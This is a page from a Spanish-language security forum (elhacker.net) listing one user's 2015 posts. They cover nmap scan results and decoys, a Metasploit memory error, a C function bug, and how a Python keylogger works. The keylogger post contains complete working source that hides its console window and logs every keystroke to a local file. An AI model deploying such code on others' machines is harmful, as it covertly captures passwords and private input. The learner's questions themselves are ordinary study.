elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


  Mostrar Mensajes
Páginas: [1]
1  Programación / Scripting / Re: duda con keylogger en: 28 Agosto 2015, 20:17 pm
osea solo se queda ejecutando esa ultima linea de codigo? que pasa cuando se recibe el evento de la tecla presionada
2  Programación / Scripting / duda con keylogger en: 27 Agosto 2015, 23:56 pm
recien estoy iniciando a aprender python y encontre este codigo de keylogger, no logro entender bien como funciona el ptyhoncom.pumpmessages().

Código:
import win32api
import win32console
import win32gui
import pythoncom,pyHook
 
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
 
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
#open output.txt to read current keystrokes
f=open('c:\output.txt','r+')
buffer=f.read()
f.close()
#open output.txt to write current + new keystrokes
f=open('c:\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
# create a hook manager object
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
# set the hook
hm.HookKeyboard()
# wait forever
pythoncom.PumpMessages()

segun lo poco que entendi de pythoncom.PumpMessages(), espera hasta que reciba otra tecla presionada pero, y luego vuelve a iniciar todo el codigo o que pasa?
3  Programación / Programación C/C++ / problema con c en: 19 Abril 2015, 19:05 pm
Hola!!, estoy con un problema desde hace un buen rato y no se porque es el error agradeceria mucho que me ayudasen. esta es la parte del codigo que me causa error.

Código
  1. int buscaPos(int arrForward[MAX][4],int cantFil, int origen, int tiempo){
  2.    int encontrado, cont;
  3.    int auxOrigen, auxTiempo, aux;
  4.  
  5.    encontrado = 0;
  6.    cont = 0;
  7.  
  8.    do{
  9.        auxOrigen = arrForward[cont][0];
  10.  
  11.        if(auxOrigen == origen){
  12.            auxTiempo = arrForward[cont][1] + arrForward[cont][2];
  13.            aux = arrForward[cont][1];
  14.  
  15.            if(origen <= tiempo){ // ESTA COMPARACION ME ARROJA ERROR
  16.                if (tiempo <= auxTiempo){
  17.                    return cont;
  18.                }
  19.            }
  20.        }
  21.        cont++;
  22.    }while((encontrado == 0) && (cont < cantFil));
  23.  
  24.    if(encontrado == 0) return -1;
  25. }

me confundi en el codigoo, este es el codigo es casi parecido
Código
  1. int buscaPos(int arrForward[MAX][4],int cantFil, int origen, int tiempo){
  2.    int encontrado, cont;
  3.    int auxOrigen, auxTiempo, aux;
  4.  
  5.    encontrado = 0;
  6.    cont = 0;
  7.  
  8.    do{
  9.        auxOrigen = arrForward[cont][0];
  10.  
  11.        if(auxOrigen == origen){
  12.            auxTiempo = arrForward[cont][1] + arrForward[cont][2];
  13.  
  14.            if(arrForward[cont][1]<= tiempo){ //ESTA COMPARACION ME ARROJA ERROR
  15.                if (tiempo <= auxTiempo){
  16.                    return cont;
  17.                }
  18.            }
  19.        }
  20.        cont++;
  21.    }while((encontrado == 0) && (cont < cantFil));
  22.  
  23.    if(encontrado == 0) return -1;
  24. }

Mod: Tema modificado
·No hacer doble post
·los códigos deben ir en GeSHi
·No escribir en mayúsculas
lee las reglas del foro
4  Seguridad Informática / Seguridad / error :ENOMEM metasploit en: 16 Febrero 2015, 05:18 am
hola!, acabo de instalar metaploit en una maquina virtual con ubuntu 14.04 sin embargo luego de terminar la instalacion y ejecutar el "msfconsole" me sale este error


/opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/activesupport-3.2.21/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``': Cannot allocate memory - infocmp (Errno::ENOMEM)
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/activesupport-3.2.21/lib/active_support/core_ext/kernel/agnostics.rb:7:in ``'
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/rb-readline-0.5.2/lib/rbreadline.rb:1814:in `get_term_capabilities'
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/rb-readline-0.5.2/lib/rbreadline.rb:2026:in `_rl_init_terminal_io'
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/rb-readline-0.5.2/lib/rbreadline.rb:2512:in `readline_initialize_everything'
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/rb-readline-0.5.2/lib/rbreadline.rb:3797:in `rl_initialize'
   from /opt/metasploit/apps/pro/vendor/bundle/ruby/2.1.0/gems/rb-readline-0.5.2/lib/rbreadline.rb:4816:in `readline'
   from /opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:132:in `readline_with_output'
   from /opt/metasploit/apps/pro/msf3/lib/rex/ui/text/input/readline.rb:86:in `pgets'
   from /opt/metasploit/apps/pro/msf3/lib/rex/ui/text/shell.rb:184:in `run'
   from /opt/metasploit/apps/pro/msf3/lib/metasploit/framework/command/console.rb:38:in `start'
   from /opt/metasploit/apps/pro/msf3/lib/metasploit/framework/command/base.rb:82:in `start'
   from /opt/metasploit/apps/pro/msf3/msfconsole:48:in `<main>'

he estado buscando una solucion y parece que tiene que ver con la memoria ram nose si estoy en lo correcto, como podria solucionar esto?
5  Seguridad Informática / Seguridad / nmap en: 14 Febrero 2015, 03:37 am
estoy empezando a usar nmap y me surgio una duda respecto al comendo -D(Decoy) , si me encuentro dentro de una red en donde hay por ejemplo 10 dispositivos y quiero escanear el router, es valido usar, por ejemplo, -D 190.168.0.3, 190.168.0.4,  es decir usar direcciones ip privadas que pertenezcan a la misma red?
6  Seguridad Informática / Seguridad / Re: duda con resultados de nmap en: 12 Febrero 2015, 05:12 am
pero ante la existencia del proxy, no deberian salir ambos resultados iguales? o es que solo filtra paquetes provenientes desde fuera de mi red.
7  Seguridad Informática / Seguridad / duda con resultados de nmap en: 12 Febrero 2015, 03:30 am
Hola! este es mi primer post en el foro. Bueno estoy aprendiendo a usar nmap y decidi hacer un scan de mi router desde mi propia red pero apuntando a mi ip publica, del resultado me salieron que todos los puertos estaban filtrados. Luego decidi hacer un escaneo a mi router pero usando la ip privada 192.168.0.1 de este escaneo me salieron 3 puertos que no estaban filtrados(80,8080 y 1900). Porque es esta diferencia, ambos escaneos los he realizado mas de una vez y el resultado es el mismo, en ambos escaneos use la opcion -sA
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines